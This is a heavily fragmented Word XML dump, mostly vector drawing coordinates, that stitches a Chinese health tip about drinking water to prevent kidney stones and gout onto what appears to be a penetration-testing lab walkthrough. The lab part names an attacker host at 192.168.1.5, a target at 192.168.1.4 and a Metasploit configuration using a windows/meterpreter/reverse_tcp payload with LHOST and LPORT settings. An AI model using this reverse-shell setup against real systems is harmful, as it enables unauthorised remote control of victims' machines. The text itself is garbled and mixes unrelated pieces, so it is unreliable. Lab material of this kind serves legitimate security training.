517,15585,1517,15589,1517,15593,1517,15598,1517,15603,1517,15608,1517,15612,1517,15617,1517,15623,1517,15628,1517,15633,1517,15639,1517,15644,1517,15650,1517,15656,1517,15662,1517,15668,1517,15674,1517,15681,1517,15687,1517,15694,1517,15700,1517,15707,1517,15714,1517,15721,1517,15729,1517,15736,1517,15744,1517,15751,1517,15759,1517,15767,1517,15775,1517,15783,1517,15792,1517,15800,1517,15809,1517,15818,1517,15827e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:408.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,8170" coordsize="130,270">
        <v:shape style="position:absolute;left:4710;top:8170;width:130;height:270" coordorigin="4710,8170" coordsize="130,270" path="m4736,8188l4736,8188,4736,8188,4736,8188,4736,8188,4736,8188,4736,8188,4736,8188,4736,8188,4736,8188,4736,8188,4736,8188,4736,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4738,8188,4738,8188,4738,8188,4738,8188,4738,8188,4739,8188,4739,8188,4739,8188,4739,8188,4739,8188,4740,8188,4740,8188,4740,8188,4741,8188,4741,8188,4741,8188,4742,8188,4742,8188,4742,8188,4743,8188,4743,8188,4744,8188,4744,8188,4745,8188,4745,8188,4746,8188,4746,8188,4747,8188,4748,8188,4748,8188,4749,8188,4750,8188,4750,8188,4751,8188,4752,8188,4753,8188,4753,8188,4754,8188,4755,8188,4756,8188,4757,8188,4758,8188,4759,8188,4760,8188,4761,8188,4762,8188,4763,8188,4764,8188,4765,8188,4766,8188,4768,8188,4769,8188,4770,8188,4772,8188,4773,8188,4774,8188,4776,8188,4777,8188,4779,8188,4780,8188,4782,8188,4783,8188,4785,8188,4787,8188,4788,8188,4790,8188,4792,8188,4794,8188,4796,8188,4797,8188,4799,8188,4801,8188,4803,8188,4806,8188,4808,8188,4810,8188,4812,8188,4814,8188,4817,8188,4819,8188,4821,8188,4824,8188,4826,8188,4829,8188,4831,8188,4834,8188,4836,8188,4839,8188,4842,8188,4845,8188,4848,8188,4850,8188,4853,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8189,4856,8189,4856,8189,4856,8189,4856,8189,4856,8189,4856,8189,4856,8190,4856,8190,4856,8190,4856,8190,4856,8190,4856,8191,4856,8191,4856,8191,4856,8192,4856,8192,4856,8193,4856,8193,4856,8194,4856,8194,4856,8195,4856,8195,4856,8196,4856,8196,4856,8197,4856,8198,4856,8199,4856,8199,4856,8200,4856,8201,4856,8202,4856,8203,4856,8204,4856,8205,4856,8206,4856,8207,4856,8208,4856,8209,4856,8211,4856,8212,4856,8213,4856,8215,4856,8216,4856,8218,4856,8219,4856,8221,4856,8222,4856,8224,4856,8226,4856,8228,4856,8230,4856,8232,4856,8234,4856,8236,4856,8238,4856,8240,4856,8242,4856,8245,4856,8247,4856,8249,4856,8252,4856,8255,4856,8257,4856,8260,4856,8263,4856,8266,4856,8269,4856,8272,4856,8275,4856,8278,4856,8281,4856,8284,4856,8288,4856,8291,4856,8295,4856,8298,4856,8302,4856,8306,4856,8310,4856,8314,4856,8318,4856,8322,4856,8326,4856,8331,4856,8335,4856,8340,4856,8344,4856,8349,4856,8354,4856,8358,4856,8363,4856,8368,4856,8374,4856,8379,4856,8384,4856,8390,4856,8395,4856,8401,4856,8407,4856,8412,4856,8418,4856,8424,4856,8431,4856,8437,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4855,8443,4855,8443,4855,8443,4855,8443,4855,8443,4855,8443,4855,8443,4854,8443,4854,8443,4854,8443,4854,8443,4853,8443,4853,8443,4853,8443,4853,8443,4852,8443,4852,8443,4852,8443,4851,8443,4851,8443,4850,8443,4850,8443,4850,8443,4849,8443,4849,8443,4848,8443,4848,8443,4847,8443,4846,8443,4846,8443,4845,8443,4845,8443,4844,8443,4843,8443,4843,8443,4842,8443,4841,8443,4840,8443,4839,8443,4839,8443,4838,8443,4837,8443,4836,8443,4835,8443,4834,8443,4833,8443,4832,8443,4831,8443,4830,8443,4829,8443,4828,8443,4826,8443,4825,8443,4824,8443,4823,8443,4821,8443,4820,8443,4819,8443,4817,8443,4816,8443,4814,8443,4813,8443,4811,8443,4810,8443,4808,8443,4806,8443,4805,8443,4803,8443,4801,8443,4799,8443,4797,8443,4795,8443,4793,8443,4791,8443,4789,8443,4787,8443,4785,8443,4783,8443,4781,8443,4779,8443,4776,8443,4774,8443,4772,8443,4769,8443,4767,8443,4764,8443,4762,8443,4759,8443,4756,8443,4754,8443,4751,8443,4748,8443,4745,8443,4742,8443,4739,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8442,4736,8442,4736,8442,4736,8442,4736,8442,4736,8441,4736,8441,4736,8441,4736,8441,4736,8440,4736,8440,4736,8440,4736,8439,4736,8439,4736,8438,4736,8438,4736,8437,4736,8437,4736,8436,4736,8436,4736,8435,4736,8434,4736,8434,4736,8433,4736,8432,4736,8431,4736,8430,4736,8429,4736,8429,4736,8428,4736,8427,4736,8425,4736,8424,4736,8423,4736,8422,4736,8421,4736,8419,4736,8418,4736,8417,4736,8415,4736,8414,4736,8412,4736,8411,4736,8409,4736,8407,4736,8405,4736,8404,4736,8402,4736,8400,4736,8398,4736,8396,4736,8394,4736,8391,4736,8389,4736,8387,4736,8384,4736,8382,4736,8379,4736,8377,4736,8374,4736,8371,4736,8369,4736,8366,4736,8363,4736,8360,4736,8357,4736,8354,4736,8350,4736,8347,4736,8344,4736,8340,4736,8337,4736,8333,4736,8329,4736,8325,4736,8321,4736,8318,4736,8313,4736,8309,4736,8305,4736,8301,4736,8296,4736,8292,4736,8287,4736,8283,4736,8278,4736,8273,4736,8268,4736,8263,4736,8258,4736,8253,4736,8247,4736,8242,4736,8236,4736,8231,4736,8225,4736,8219,4736,8213,4736,8207,4736,8201,4736,8195,4736,8188e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:271.500pt;margin-top:408.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5430,8170" coordsize="130,270">
        <v:shape style="position:absolute;left:5430;top:8170;width:130;height:270" coordorigin="5430,8170" coordsize="130,270" path="m5457,8188l5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5458,8188,5458,8188,5458,8188,5458,8188,5458,8188,5458,8188,5458,8188,5458,8188,5459,8188,5459,8188,5459,8188,5459,8188,5460,8188,5460,8188,5460,8188,5460,8188,5461,8188,5461,8188,5461,8188,5462,8188,5462,8188,5462,8188,5463,8188,5463,8188,5464,8188,5464,8188,5465,8188,5465,8188,5466,8188,5466,8188,5467,8188,5467,8188,5468,8188,5469,8188,5469,8188,5470,8188,5471,8188,5471,8188,5472,8188,5473,8188,5474,8188,5475,8188,5475,8188,5476,8188,5477,8188,5478,8188,5479,8188,5480,8188,5481,8188,5482,8188,5483,8188,5484,8188,5486,8188,5487,8188,5488,8188,5489,8188,5491,8188,5492,8188,5493,8188,5495,8188,5496,8188,5497,8188,5499,8188,5501,8188,5502,8188,5504,8188,5505,8188,5507,8188,5509,8188,5510,8188,5512,8188,5514,8188,5516,8188,5518,8188,5520,8188,5522,8188,5524,8188,5526,8188,5528,8188,5530,8188,5532,8188,5535,8188,5537,8188,5539,8188,5542,8188,5544,8188,5546,8188,5549,8188,5552,8188,5554,8188,5557,8188,5560,8188,5562,8188,5565,8188,5568,8188,5571,8188,5574,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8189,5577,8189,5577,8189,5577,8189,5577,8189,5577,8189,5577,8189,5577,8190,5577,8190,5577,8190,5577,8190,5577,8190,5577,8191,5577,8191,5577,8191,5577,8192,5577,8192,5577,8193,5577,8193,5577,8194,5577,8194,5577,8195,5577,8195,5577,8196,5577,8196,5577,8197,5577,8198,5577,8199,5577,8199,5577,8200,5577,8201,5577,8202,5577,8203,5577,8204,5577,8205,5577,8206,5577,8207,5577,8208,5577,8209,5577,8211,5577,8212,5577,8213,5577,8215,5577,8216,5577,8218,5577,8219,5577,8221,5577,8222,5577,8224,5577,8226,5577,8228,5577,8230,5577,8232,5577,8234,5577,8236,5577,8238,5577,8240,5577,8242,5577,8245,5577,8247,5577,8249,5577,8252,5577,8255,5577,8257,5577,8260,5577,8263,5577,8266,5577,8269,5577,8272,5577,8275,5577,8278,5577,8281,5577,8284,5577,8288,5577,8291,5577,8295,5577,8298,5577,8302,5577,8306,5577,8310,5577,8314,5577,8318,5577,8322,5577,8326,5577,8331,5577,8335,5577,8340,5577,8344,5577,8349,5577,8354,5577,8358,5577,8363,5577,8368,5577,8374,5577,8379,5577,8384,5577,8390,5577,8395,5577,8401,5577,8407,5577,8412,5577,8418,5577,8424,5577,8431,5577,8437,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5576,8443,5576,8443,5576,8443,5576,8443,5576,8443,5576,8443,5576,8443,5576,8443,5576,8443,5576,8443,5575,8443,5575,8443,5575,8443,5575,8443,5575,8443,5574,8443,5574,8443,5574,8443,5574,8443,5573,8443,5573,8443,5573,8443,5573,8443,5572,8443,5572,8443,5572,8443,5571,8443,5571,8443,5570,8443,5570,8443,5569,8443,5569,8443,5568,8443,5568,8443,5567,8443,5567,8443,5566,8443,5566,8443,5565,8443,5564,8443,5564,8443,5563,8443,5562,8443,5561,8443,5561,8443,5560,8443,5559,8443,5558,8443,5557,8443,5556,8443,5555,8443,5554,8443,5553,8443,5552,8443,5551,8443,5550,8443,5549,8443,5548,8443,5547,8443,5546,8443,5544,8443,5543,8443,5542,8443,5540,8443,5539,8443,5538,8443,5536,8443,5535,8443,5533,8443,5531,8443,5530,8443,5528,8443,5527,8443,5525,8443,5523,8443,5521,8443,5520,8443,5518,8443,5516,8443,5514,8443,5512,8443,5510,8443,5508,8443,5506,8443,5503,8443,5501,8443,5499,8443,5497,8443,5494,8443,5492,8443,5490,8443,5487,8443,5485,8443,5482,8443,5479,8443,5477,8443,5474,8443,5471,8443,5468,8443,5466,8443,5463,8443,5460,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8442,5457,8442,5457,8442,5457,8442,5457,8442,5457,8441,5457,8441,5457,8441,5457,8441,5457,8440,5457,8440,5457,8440,5457,8439,5457,8439,5457,8438,5457,8438,5457,8437,5457,8437,5457,8436,5457,8436,5457,8435,5457,8434,5457,8434,5457,8433,5457,8432,5457,8431,5457,8430,5457,8429,5457,8429,5457,8428,5457,8427,5457,8425,5457,8424,5457,8423,5457,8422,5457,8421,5457,8419,5457,8418,5457,8417,5457,8415,5457,8414,5457,8412,5457,8411,5457,8409,5457,8407,5457,8405,5457,8404,5457,8402,5457,8400,5457,8398,5457,8396,5457,8394,5457,8391,5457,8389,5457,8387,5457,8384,5457,8382,5457,8379,5457,8377,5457,8374,5457,8371,5457,8369,5457,8366,5457,8363,5457,8360,5457,8357,5457,8354,5457,8350,5457,8347,5457,8344,5457,8340,5457,8337,5457,8333,5457,8329,5457,8325,5457,8321,5457,8318,5457,8313,5457,8309,5457,8305,5457,8301,5457,8296,5457,8292,5457,8287,5457,8283,5457,8278,5457,8273,5457,8268,5457,8263,5457,8258,5457,8253,5457,8247,5457,8242,5457,8236,5457,8231,5457,8225,5457,8219,5457,8213,5457,8207,5457,8201,5457,8195,5457,8188e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:241.500pt;margin-top:514.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4830,10290" coordsize="130,250">
        <v:shape style="position:absolute;left:4830;top:10290;width:130;height:250" coordorigin="4830,10290" coordsize="130,250" path="m4856,10304l4856,10304,4856,10304,4856,10304,4856,10304,4856,10304,4856,10304,4856,10304,4856,10304,4856,10304,4856,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4858,10304,4858,10304,4858,10304,4858,10304,4858,10304,4858,10304,4859,10304,4859,10304,4859,10304,4859,10304,4860,10304,4860,10304,4860,10304,4860,10304,4861,10304,4861,10304,4861,10304,4862,10304,4862,10304,4863,10304,4863,10304,4863,10304,4864,10304,4864,10304,4865,10304,4865,10304,4866,10304,4866,10304,4867,10304,4868,10304,4868,10304,4869,10304,4870,10304,4870,10304,4871,10304,4872,10304,4873,10304,4873,10304,4874,10304,4875,10304,4876,10304,4877,10304,4878,10304,4879,10304,4880,10304,4881,10304,4882,10304,4883,10304,4884,10304,4885,10304,4887,10304,4888,10304,4889,10304,4890,10304,4892,10304,4893,10304,4894,10304,4896,10304,4897,10304,4899,10304,4900,10304,4902,10304,4903,10304,4905,10304,4907,10304,4908,10304,4910,10304,4912,10304,4914,10304,4916,10304,4918,10304,4919,10304,4921,10304,4924,10304,4926,10304,4928,10304,4930,10304,4932,10304,4934,10304,4937,10304,4939,10304,4941,10304,4944,10304,4946,10304,4949,10304,4951,10304,4954,10304,4957,10304,4959,10304,4962,10304,4965,10304,4968,10304,4971,10304,4974,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10305,4977,10305,4977,10305,4977,10305,4977,10305,4977,10305,4977,10305,4977,10305,4977,10306,4977,10306,4977,10306,4977,10306,4977,10307,4977,10307,4977,10307,4977,10308,4977,10308,4977,10308,4977,10309,4977,10309,4977,10310,4977,10310,4977,10311,4977,10311,4977,10312,4977,10313,4977,10313,4977,10314,4977,10315,4977,10315,4977,10316,4977,10317,4977,10318,4977,10319,4977,10320,4977,10321,4977,10322,4977,10323,4977,10324,4977,10325,4977,10327,4977,10328,4977,10329,4977,10331,4977,10332,4977,10334,4977,10335,4977,10337,4977,10339,4977,10340,4977,10342,4977,10344,4977,10346,4977,10348,4977,10350,4977,10352,4977,10354,4977,10356,4977,10358,4977,10361,4977,10363,4977,10366,4977,10368,4977,10371,4977,10373,4977,10376,4977,10379,4977,10382,4977,10385,4977,10388,4977,10391,4977,10394,4977,10397,4977,10400,4977,10404,4977,10407,4977,10411,4977,10415,4977,10418,4977,10422,4977,10426,4977,10430,4977,10434,4977,10438,4977,10442,4977,10447,4977,10451,4977,10456,4977,10460,4977,10465,4977,10470,4977,10474,4977,10479,4977,10485,4977,10490,4977,10495,4977,10500,4977,10506,4977,10511,4977,10517,4977,10523,4977,10528,4977,10534,4977,10541,4977,10547,4977,10553,4977,10559,4977,10559,4977,10559,4977,10559,4977,10559,4977,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4975,10559,4975,10559,4975,10559,4975,10559,4975,10559,4975,10559,4974,10559,4974,10559,4974,10559,4974,10559,4973,10559,4973,10559,4973,10559,4973,10559,4972,10559,4972,10559,4972,10559,4971,10559,4971,10559,4970,10559,4970,10559,4970,10559,4969,10559,4969,10559,4968,10559,4968,10559,4967,10559,4966,10559,4966,10559,4965,10559,4965,10559,4964,10559,4963,10559,4963,10559,4962,10559,4961,10559,4960,10559,4960,10559,4959,10559,4958,10559,4957,10559,4956,10559,4955,10559,4954,10559,4953,10559,4952,10559,4951,10559,4950,10559,4949,10559,4948,10559,4946,10559,4945,10559,4944,10559,4943,10559,4941,10559,4940,10559,4939,10559,4937,10559,4936,10559,4934,10559,4933,10559,4931,10559,4930,10559,4928,10559,4926,10559,4925,10559,4923,10559,4921,10559,4919,10559,4917,10559,4915,10559,4913,10559,4911,10559,4909,10559,4907,10559,4905,10559,4903,10559,4901,10559,4899,10559,4896,10559,4894,10559,4892,10559,4889,10559,4887,10559,4884,10559,4882,10559,4879,10559,4876,10559,4874,10559,4871,10559,4868,10559,4865,10559,4862,10559,4859,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10558,4856,10558,4856,10558,4856,10558,4856,10558,4856,10557,4856,10557,4856,10557,4856,10557,4856,10556,4856,10556,4856,10556,4856,10555,4856,10555,4856,10554,4856,10554,4856,10553,4856,10553,4856,10552,4856,10552,4856,10551,4856,10550,4856,10550,4856,10549,4856,10548,4856,10547,4856,10546,4856,10546,4856,10545,4856,10544,4856,10543,4856,10542,4856,10540,4856,10539,4856,10538,4856,10537,4856,10535,4856,10534,4856,10533,4856,10531,4856,10530,4856,10528,4856,10527,4856,10525,4856,10523,4856,10521,4856,10520,4856,10518,4856,10516,4856,10514,4856,10512,4856,10510,4856,10507,4856,10505,4856,10503,4856,10500,4856,10498,4856,10495,4856,10493,4856,10490,4856,10487,4856,10485,4856,10482,4856,10479,4856,10476,4856,10473,4856,10470,4856,10466,4856,10463,4856,10460,4856,10456,4856,10453,4856,10449,4856,10445,4856,10441,4856,10438,4856,10434,4856,10430,4856,10425,4856,10421,4856,10417,4856,10412,4856,10408,4856,10403,4856,10399,4856,10394,4856,10389,4856,10384,4856,10379,4856,10374,4856,10369,4856,10363,4856,10358,4856,10352,4856,10347,4856,10341,4856,10335,4856,10329,4856,10323,4856,10317,4856,10311,4856,10304e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:313.500pt;margin-top:514.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6270,10290" coordsize="130,250">
        <v:shape style="position:absolute;left:6270;top:10290;width:130;height:250" coordorigin="6270,10290" coordsize="130,250" path="m6297,10304l6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6298,10304,6298,10304,6298,10304,6298,10304,6298,10304,6298,10304,6298,10304,6298,10304,6298,10304,6298,10304,6299,10304,6299,10304,6299,10304,6299,10304,6299,10304,6300,10304,6300,10304,6300,10304,6300,10304,6300,10304,6301,10304,6301,10304,6301,10304,6302,10304,6302,10304,6302,10304,6303,10304,6303,10304,6304,10304,6304,10304,6305,10304,6305,10304,6306,10304,6306,10304,6307,10304,6307,10304,6308,10304,6308,10304,6309,10304,6310,10304,6310,10304,6311,10304,6312,10304,6313,10304,6313,10304,6314,10304,6315,10304,6316,10304,6317,10304,6318,10304,6319,10304,6320,10304,6321,10304,6322,10304,6323,10304,6324,10304,6325,10304,6326,10304,6327,10304,6328,10304,6330,10304,6331,10304,6332,10304,6334,10304,6335,10304,6336,10304,6338,10304,6339,10304,6341,10304,6342,10304,6344,10304,6346,10304,6347,10304,6349,10304,6351,10304,6353,10304,6354,10304,6356,10304,6358,10304,6360,10304,6362,10304,6364,10304,6366,10304,6368,10304,6371,10304,6373,10304,6375,10304,6377,10304,6380,10304,6382,10304,6384,10304,6387,10304,6389,10304,6392,10304,6395,10304,6397,10304,6400,10304,6403,10304,6406,10304,6408,10304,6411,10304,6414,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10305,6417,10305,6417,10305,6417,10305,6417,10305,6417,10305,6417,10305,6417,10305,6417,10306,6417,10306,6417,10306,6417,10306,6417,10307,6417,10307,6417,10307,6417,10308,6417,10308,6417,10308,6417,10309,6417,10309,6417,10310,6417,10310,6417,10311,6417,10311,6417,10312,6417,10313,6417,10313,6417,10314,6417,10315,6417,10315,6417,10316,6417,10317,6417,10318,6417,10319,6417,10320,6417,10321,6417,10322,6417,10323,6417,10324,6417,10325,6417,10327,6417,10328,6417,10329,6417,10331,6417,10332,6417,10334,6417,10335,6417,10337,6417,10339,6417,10340,6417,10342,6417,10344,6417,10346,6417,10348,6417,10350,6417,10352,6417,10354,6417,10356,6417,10358,6417,10361,6417,10363,6417,10366,6417,10368,6417,10371,6417,10373,6417,10376,6417,10379,6417,10382,6417,10385,6417,10388,6417,10391,6417,10394,6417,10397,6417,10400,6417,10404,6417,10407,6417,10411,6417,10415,6417,10418,6417,10422,6417,10426,6417,10430,6417,10434,6417,10438,6417,10442,6417,10447,6417,10451,6417,10456,6417,10460,6417,10465,6417,10470,6417,10474,6417,10479,6417,10485,6417,10490,6417,10495,6417,10500,6417,10506,6417,10511,6417,10517,6417,10523,6417,10528,6417,10534,6417,10541,6417,10547,6417,10553,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6416,10559,6416,10559,6416,10559,6416,10559,6416,10559,6416,10559,6416,10559,6415,10559,6415,10559,6415,10559,6415,10559,6415,10559,6414,10559,6414,10559,6414,10559,6414,10559,6413,10559,6413,10559,6413,10559,6412,10559,6412,10559,6412,10559,6411,10559,6411,10559,6410,10559,6410,10559,6409,10559,6409,10559,6408,10559,6408,10559,6407,10559,6407,10559,6406,10559,6405,10559,6405,10559,6404,10559,6403,10559,6403,10559,6402,10559,6401,10559,6400,10559,6399,10559,6399,10559,6398,10559,6397,10559,6396,10559,6395,10559,6394,10559,6393,10559,6392,10559,6391,10559,6390,10559,6388,10559,6387,10559,6386,10559,6385,10559,6383,10559,6382,10559,6381,10559,6379,10559,6378,10559,6376,10559,6375,10559,6373,10559,6372,10559,6370,10559,6369,10559,6367,10559,6365,10559,6364,10559,6362,10559,6360,10559,6358,10559,6356,10559,6354,10559,6352,10559,6350,10559,6348,10559,6346,10559,6344,10559,6342,10559,6339,10559,6337,10559,6335,10559,6332,10559,6330,10559,6327,10559,6325,10559,6322,10559,6320,10559,6317,10559,6314,10559,6312,10559,6309,10559,6306,10559,6303,10559,6300,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10558,6297,10558,6297,10558,6297,10558,6297,10558,6297,10557,6297,10557,6297,10557,6297,10557,6297,10556,6297,10556,6297,10556,6297,10555,6297,10555,6297,10554,6297,10554,6297,10553,6297,10553,6297,10552,6297,10552,6297,10551,6297,10550,6297,10550,6297,10549,6297,10548,6297,10547,6297,10546,6297,10546,6297,10545,6297,10544,6297,10543,6297,10542,6297,10540,6297,10539,6297,10538,6297,10537,6297,10535,6297,10534,6297,10533,6297,10531,6297,10530,6297,10528,6297,10527,6297,10525,6297,10523,6297,10521,6297,10520,6297,10518,6297,10516,6297,10514,6297,10512,6297,10510,6297,10507,6297,10505,6297,10503,6297,10500,6297,10498,6297,10495,6297,10493,6297,10490,6297,10487,6297,10485,6297,10482,6297,10479,6297,10476,6297,10473,6297,10470,6297,10466,6297,10463,6297,10460,6297,10456,6297,10453,6297,10449,6297,10445,6297,10441,6297,10438,6297,10434,6297,10430,6297,10425,6297,10421,6297,10417,6297,10412,6297,10408,6297,10403,6297,10399,6297,10394,6297,10389,6297,10384,6297,10379,6297,10374,6297,10369,6297,10363,6297,10358,6297,10352,6297,10347,6297,10341,6297,10335,6297,10329,6297,10323,6297,10317,6297,10311,6297,10304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注：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>请多喝点热水或者凉白开，可预防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>肾结石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，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通风</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等。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痛风可伴</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>发肥胖症、高血压病、糖尿病、脂代谢紊乱等多种代谢性疾病。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4316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9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击机：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192.168.1.5</w:t>
      </w:r>
      <w:r>
        <w:tab/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Debian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3971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靶机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="3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192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w: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26"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7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2161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192.168.1.119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2003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攻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>击机配置：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paylo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ad：windows/meterpreter/reverse_tcp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491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346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="515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4791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5"/>
        </w:rPr>
        <w:t>  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7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="25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8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383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Payload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windows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meterpreter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reverse_tcp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5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EXITFUNC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process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Exit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technique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Accepted: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''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seh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proce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ss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none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LHOST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.5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listen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an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interface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may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be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specifi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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ed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)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="6261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1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LPORT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1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listen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port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16</w:t>
      </w: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17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="124" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7942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9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target: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19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1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Id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="1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13"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
